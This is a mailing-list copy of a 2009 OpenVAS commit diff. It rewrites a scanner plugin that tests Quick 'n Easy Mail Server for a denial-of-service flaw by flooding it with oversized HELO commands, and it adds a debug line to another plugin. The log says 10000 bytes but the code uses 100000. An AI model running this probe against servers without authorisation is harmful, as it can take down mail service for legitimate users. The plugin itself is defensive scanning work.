[Openvas-commits] r3386 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Fri May 15 16:08:32 CEST 2009
Author: chandra
Date: 2009-05-15 16:08:24 +0200 (Fri, 15 May 2009)
New Revision: 3386
Modified:
trunk/openvas-plugins/ChangeLog
trunk/openvas-plugins/scripts/quick_easy_mail_server_34814.nasl
trunk/openvas-plugins/scripts/remote-sgi-objectserver.nasl
Log:
crap length increased to 10000.
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2009-05-15 13:43:07 UTC (rev 3385)
+++ trunk/openvas-plugins/ChangeLog 2009-05-15 14:08:24 UTC (rev 3386)
@@ -1,3 +1,7 @@
+2009-05-15 Chandan S <schandan at secpod.com>
+ * quick_easy_mail_server_34814.nasl:
+ Updated the crap length.
+
2009-05-14 Michael Meyer <mime at gmx.de>
* scripts/FormMail_34929.nasl,
scripts/squirrelmail_1_4_18.nasl,
Modified: trunk/openvas-plugins/scripts/quick_easy_mail_server_34814.nasl
===================================================================
--- trunk/openvas-plugins/scripts/quick_easy_mail_server_34814.nasl 2009-05-15 13:43:07 UTC (rev 3385)
+++ trunk/openvas-plugins/scripts/quick_easy_mail_server_34814.nasl 2009-05-15 14:08:24 UTC (rev 3386)
@@ -7,6 +7,8 @@
# Authors
# Michael Meyer
#
+# Increased crap length to 10000 (By Michael Meyer, 2009-05-15)
+#
# Copyright:
# Copyright (c) 2009 Michael Meyer
#
@@ -42,7 +44,7 @@
to reject SMTP requests, denying service to legitimate users.
The demonstration release of Quick 'n Easy Mail Server 3.3 is
- vulnerable; other versions may also be affected.
+ vulnerable; other versions may also be affected.
See also:
http://www.securityfocus.com/bid/34814
@@ -59,49 +61,51 @@
exit(0);
}
+
include("smtp_func.inc");
-if ( safe_checks() ) exit(0);
+if(safe_checks()){
+ exit(0);
+}
port = get_kb_item("Services/smtp");
-if (!port) port = 25;
+if(!port){
+ port = 25;
+}
-if (get_port_state(port))
+if(get_port_state(port))
{
- soctcp25 = open_sock_tcp(port);
+ soctcp25 = open_sock_tcp(port);
+ if (soctcp25)
+ {
+ bannertxt = smtp_recv_banner(socket:soctcp25);
+ if(!bannertxt)
+ {
+ close(soctcp25);
+ exit(0);
+ }
- if (soctcp25)
- {
- bannertxt = smtp_recv_banner(socket:soctcp25);
+ if(!("Quick 'n Easy Mail Server" >< bannertxt))
+ {
+ close(soctcp25);
+ exit(0);
+ }
- if(!bannertxt){
- close(soctcp25);
+ close(soctcp25);
+ data = string("HELO ");
+ data += crap(length: 100000, data:"OpenVAS at openvas.org");
+ data += string("\r\n");
+ for(i=0; i<35; i++)
+ {
+ soctcp = open_sock_tcp(port);
+ send(socket:soctcp, data:data);
+ ehlotxt = smtp_recv_line(socket:soctcp);
+ if(egrep(pattern:"421 Service not available", string: ehlotxt))
+ {
+ security_warning(port:port);
+ close(soctcp);
exit(0);
+ }
+ }
}
-
- if( ! ("Quick 'n Easy Mail Server" >< bannertxt)) {
- close(soctcp25);
- exit(0);
- }
-
- close(soctcp25);
- data = string("HELO OpenVAS at openvas.org\r\n");
-
- for(i=0; i<35; i++) {
-
- soctcp = open_sock_tcp(port);
- send(socket:soctcp, data:data);
- ehlotxt = smtp_recv_line(socket:soctcp);
-
- if(egrep(pattern:"421 Service not available", string: ehlotxt)) {
- security_warning(port:port);
- close(soctcp);
- exit(0);
- }
- }
- }
}
-
-close(soctcp);
-exit(0);
-
Modified: trunk/openvas-plugins/scripts/remote-sgi-objectserver.nasl
===================================================================
--- trunk/openvas-plugins/scripts/remote-sgi-objectserver.nasl 2009-05-15 13:43:07 UTC (rev 3385)
+++ trunk/openvas-plugins/scripts/remote-sgi-objectserver.nasl 2009-05-15 14:08:24 UTC (rev 3386)
@@ -78,6 +78,7 @@
for (i = 0; i < 2; i ++) # Try twice
{
rep = send_packet(u, pcap_active:TRUE, pcap_filter:filter, pcap_timeout:1);
+ security_note(data:"REP: " + rep);
if(rep) {
gotresp = 1;
data = get_udp_element(udp: rep, element:"data");
More information about the Openvas-commits
mailing list